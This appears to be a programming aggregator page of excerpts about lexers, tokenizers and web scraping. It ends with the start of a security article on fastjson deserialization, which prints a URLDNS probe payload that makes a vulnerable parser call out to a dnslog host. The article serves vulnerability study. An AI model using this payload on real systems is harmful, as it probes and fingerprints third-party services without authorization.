lexer

C# Web-Scraping in Practice

Submitted by 橙三吉。 on 2021-02-10 07:57:22
  I forget when I added it, but I had been following the TV series "My Brilliant Friend" on the RenRen Video app on my iPad, watching when I had spare time, and I liked it well enough to look into the source material, the Neapolitan Novels. The show was progressing slowly, so I wanted to find the books. I couldn't find them right away [PS: the print set costs forty-odd yuan; I can afford it, but since I only want to read the story rather than collect it, it isn't worth buying. I hope to pay for it properly someday; besides, I'm more used to reading PDFs on my SP4 or syncing reading progress across devices with Duokan]. I did find a site where the text could be read online, and since I had been using C# recently, I decided to write a C# program to scrape the content automatically. After five or six hours on and off, it works.

  Since I haven't really studied web scraping, I don't know whether this follows accepted crawler design principles. All I did was fetch page content with WebRequest, inspect it by hand to find distinguishing feature points, and extract what I wanted. For this task I first scraped the table of contents to get every chapter and its page link, then fetched each page's content, and saved the chapter titles together with the text. Both the chapter-link extraction and the per-page content extraction were worked out by observation and trial. I don't know whether my design is at fault or this is simply the nature of scraping, but it seems hard to write a general-purpose crawler or find universal feature points: even among online-reading sites, different front-end code means different extraction features. At the moment I analyze the raw page content directly; perhaps there are mature libraries that can extract the desired content directly.

  In any case, having gone through the trouble, I'm writing it down so I can refer back to it later, and storing it online guards against loss. Code to fetch the page content: /* *
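The approach described above (fetch a page, then pull chapter titles and links out of the HTML by hand-picked feature points) is done in C# with WebRequest in the post. As a neutral sketch of the same idea, here is a Python version run against an invented HTML fragment; the markup, class name, and URLs are made up for illustration:

```python
import re

# Invented sample of what a chapter-index page might look like; real sites
# differ, which is exactly the post's point about non-universal feature points.
SAMPLE_HTML = """
<ul class="chapter-list">
  <li><a href="/book/1.html">Chapter 1</a></li>
  <li><a href="/book/2.html">Chapter 2</a></li>
</ul>
"""

# The hand-picked "feature point" here: anchors inside the chapter list.
CHAPTER_RE = re.compile(r'<a href="([^"]+)">([^<]+)</a>')

chapters = CHAPTER_RE.findall(SAMPLE_HTML)
for url, title in chapters:
    print(title, "->", url)
```

In a real scraper the HTML would come from an HTTP request rather than a literal, and a proper HTML parser is more robust than a regex once pages get messy.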

Scanner (Lexing keywords with ANTLR)

Submitted by 倾然丶 夕夏残阳落幕 on 2021-02-04 21:28:29
Question: I have been working on writing a scanner for my program, and most of the tutorials online include a parser along with the scanner. It doesn't seem possible to write a lexer without writing a parser at the same time. I am only trying to generate tokens, not interpret them. I want to recognize INT tokens, float tokens, and some tokens like "begin" and "end". I am confused about how to match keywords. I unsuccessfully tried the following: KEYWORD : KEY1 | KEY2; KEY1 : {input.LT(1).getText().equals
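A common ANTLR answer is to declare each keyword as its own lexer rule placed before the identifier rule, so keywords win by rule order. As a sketch of that priority idea in plain Python (this is not ANTLR itself; the patterns and token names are illustrative):

```python
import re

# Keywords are promoted after matching the general identifier pattern,
# mirroring how listing keyword rules first makes them win in a lexer.
KEYWORDS = {"begin", "end"}
TOKEN_RE = re.compile(r"(?P<FLOAT>\d+\.\d+)|(?P<INT>\d+)|(?P<ID>[A-Za-z_]\w*)|\s+")

def tokenize(src: str):
    tokens = []
    for m in TOKEN_RE.finditer(src):
        kind = m.lastgroup
        if kind is None:
            continue  # whitespace has no named group; skip it
        text = m.group()
        if kind == "ID" and text in KEYWORDS:
            kind = text.upper()  # an identifier that is a keyword becomes BEGIN/END
        tokens.append((kind, text))
    return tokens

print(tokenize("begin x 3 4.5 end"))
# [('BEGIN', 'begin'), ('ID', 'x'), ('INT', '3'), ('FLOAT', '4.5'), ('END', 'end')]
```

This "keyword table" trick is also how many hand-written scanners avoid a separate rule per keyword.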

How to parse multiple line code using RPLY library?

Submitted by 一世执手 on 2021-02-04 08:36:45
Question: I am working on the development of a new language, and I am using the RPLY library for lexing and parsing. Now I am stuck: I get an error when I use more than one line in the code file. Here are my files: mylexer.py from rply import LexerGenerator class Lexer(): def __init__(self): self.lexer = LexerGenerator() def _add_tokens(self): # Print self.lexer.add('PRINT', r'print') # Parenthesis self.lexer.add('OPEN_PAREN', r'\(') self.lexer.add('CLOSE_PAREN', r'\)') # Semi Colon self.lexer
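rply's LexerGenerator has an ignore() method, and the usual fix for input that spans several lines is to ignore whitespace including newlines (for example lg.ignore(r'\s+')). Since rply is a third-party package, here is a stdlib-only sketch of the same idea: the lexer skips whitespace between tokens instead of failing at the first newline (token names mirror the question; the STRING and SEMI rules are assumptions):

```python
import re

# Minimal stand-in for an rply-style lexer: named token patterns plus an
# "ignore" pattern for whitespace (including newlines), which is the usual
# fix when a lexer errors on the second line of input.
RULES = [
    ("PRINT", r"print"),
    ("OPEN_PAREN", r"\("),
    ("CLOSE_PAREN", r"\)"),
    ("STRING", r'"[^"]*"'),
    ("SEMI", r";"),
]
IGNORE = re.compile(r"\s+")

def lex(src: str):
    pos, out = 0, []
    while pos < len(src):
        m = IGNORE.match(src, pos)
        if m:
            pos = m.end()  # silently consume whitespace and newlines
            continue
        for name, pat in RULES:
            m = re.compile(pat).match(src, pos)
            if m:
                out.append((name, m.group()))
                pos = m.end()
                break
        else:
            raise ValueError(f"unexpected character at {pos}: {src[pos]!r}")
    return out

print(lex('print("a");\nprint("b");'))
```

Without the IGNORE step, the loop would raise on the '\n' between the two statements, which matches the symptom in the question.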

C# Lexer, Part 7: Summary

Submitted by 落爺英雄遲暮 on 2021-02-04 07:27:32
Series navigation: (1) Introduction to Lexical Analysis; (2) Input Buffering and Source Locations; (3) Regular Expressions; (4) Constructing the NFA; (5) Converting to a DFA; (6) Building the Lexer; (7) Summary.

In the previous six articles I covered the algorithms behind a lexer in some detail. They focus on implementation details and may feel fragmented, so this article gives an overall view of how to define a lexer and how to implement your own. Section 2 is a complete description of how to define a lexer and can serve as a usage guide; if you are not interested in the implementation, you can read Section 2 alone.

I. Changes to the library

First, I need to explain some changes I made to the library. The lexical-analysis interfaces have changed considerably since the original "C# Lexer" series was written, so an explanation is in order.

1. Token identifiers

A token was originally defined as a Token struct that used an int property as its identifier, which is the common approach in many lexers. But once I started on syntax analysis this turned out to be very inconvenient: generating lexer code from a definition file is not yet supported, so the lexer must be defined in program code, and a bare int carries no semantics, making it both inconvenient and error-prone as a token identifier. I then tried strings as identifiers; that solved the semantics problem, but it was still error-prone and more complex to implement (a string dictionary has to be maintained). The solution that is both simple and semantic is an enum: the enum name provides the semantics, and the enum value can be converted to an integer
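The enum-based token identifier the author settles on is a C# design; the same idea can be sketched in Python (the token kinds here are illustrative):

```python
from enum import Enum, auto
from typing import NamedTuple

class TokenKind(Enum):
    # The enum name carries the meaning; the value converts to an int,
    # so table-driven code can still index by integer if it wants to.
    INT = auto()
    FLOAT = auto()
    IDENT = auto()

class Token(NamedTuple):
    kind: TokenKind
    text: str

tok = Token(TokenKind.INT, "42")
print(tok.kind.name, tok.kind.value)  # INT 1
```

Compared with bare ints, a typo like TokenKind.INTT is a compile-time/lookup error rather than a silently wrong number, which is the article's point.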

How to fix the “multi-character literals are not allowed” error in antlr4 lexer rule?

Submitted by 佐手、 on 2021-01-28 06:04:34
Question: The rule I am trying to write is: Character : '\u0000'..'\u10FFF'; But when I run the antlr tool against the lexer file where it is defined, I get the following error: multi-character literals are not allowed in lexer sets: '\u10FFF' How can I resolve this? Answer 1: Try wrapping the multi-char literal with { and }, and use the v4-style character set [...]: Character : [\u0000-\u{10FFF}]; From https://github.com/antlr/antlr4/blob/master/doc/lexer-rules.md#lexer-rule-elements: [...] Match
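The character set in the answer is just an inclusive code-point range. As a sanity check, this Python sketch tests membership in the same range the question uses (it deliberately keeps the question's literal \u10FFF upper bound as-is):

```python
def in_char_set(ch: str, lo: int = 0x0000, hi: int = 0x10FFF) -> bool:
    """Return True if ch's code point lies in the inclusive range [lo, hi]."""
    return lo <= ord(ch) <= hi

print(in_char_set("A"))              # 'A' is U+0041, inside the range
print(in_char_set("\U00010FFF"))     # exactly the upper bound
print(in_char_set("\U00011000"))     # one past the bound
```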

Accessing tokenization of a C++ source file

Submitted by 纵饮孤独 on 2021-01-25 23:04:09
Question: My understanding is that one step of the compilation of a program (irrespective of the language, I guess) is parsing the source file into some kind of space-separated tokens (this tokenization would be done by what's referred to as a scanner in this answer). For instance, I understand that at some point in the compilation process, a line containing x += fun(nullptr); is separated into something like x += fun ( nullptr ) ; Is this true? If so, is there a way to have access to this tokenization of a
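Compilers do lex source into tokens, though not by splitting on spaces; Clang, for instance, can print its token stream with -Xclang -dump-tokens (passed alongside -fsyntax-only). As a toy illustration of the example line only, here is a Python sketch; the regex is invented for this one line and is nowhere near a real C++ lexer:

```python
import re

# A toy scanner for the example line. Real C++ lexing is far more involved:
# preprocessing, string literals, and maximal munch for operators like '+='.
TOKEN_RE = re.compile(r"\+=|[A-Za-z_]\w*|[(){};]")

def tokenize(line: str) -> list[str]:
    return TOKEN_RE.findall(line)

print(tokenize("x += fun(nullptr);"))
# ['x', '+=', 'fun', '(', 'nullptr', ')', ';']
```

Note that '+=' must be listed before any single-character alternatives so the two-character operator is matched as one token (maximal munch).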

Reverse-Engineering fastjson Deserialization, Start to Finish

Submitted by 末鹿安然 on 2020-10-03 16:20:40
Author: summersec. This article is a reader contribution; Seebug Paper welcomes your submissions, and every accepted article receives a gift! Submission email: paper@seebug.org

Preface: fastjson is a well-known Chinese JSON-parsing component that needs little introduction here, and there are many articles online analyzing its deserialization vulnerabilities. I take a different angle: working backwards from how the payload is constructed, I analyze the fastjson deserialization vulnerability from beginning to end. PS: the lab environment and code have been uploaded to the GitHub project.

A first look at the payload. Below is the simplest fastjson version-probing deserialization payload (URLDNS). Studying it raises a question: what does @type do?

    import com.alibaba.fastjson.JSON;

    public class urldns {
        public static void main(String[] args) {
            // dnslog platform: http://www.dnslog.cn/
            String payload = "{{\"@type\":\"java.net.URL\",\"val\""
                    + ":\"http://h2a6yj.dnslog.cn\"}:\"summer\"}";
            JSON.parse(payload);
        }
    }

The role of @type. Below is some experimental code to help understand where @type comes from.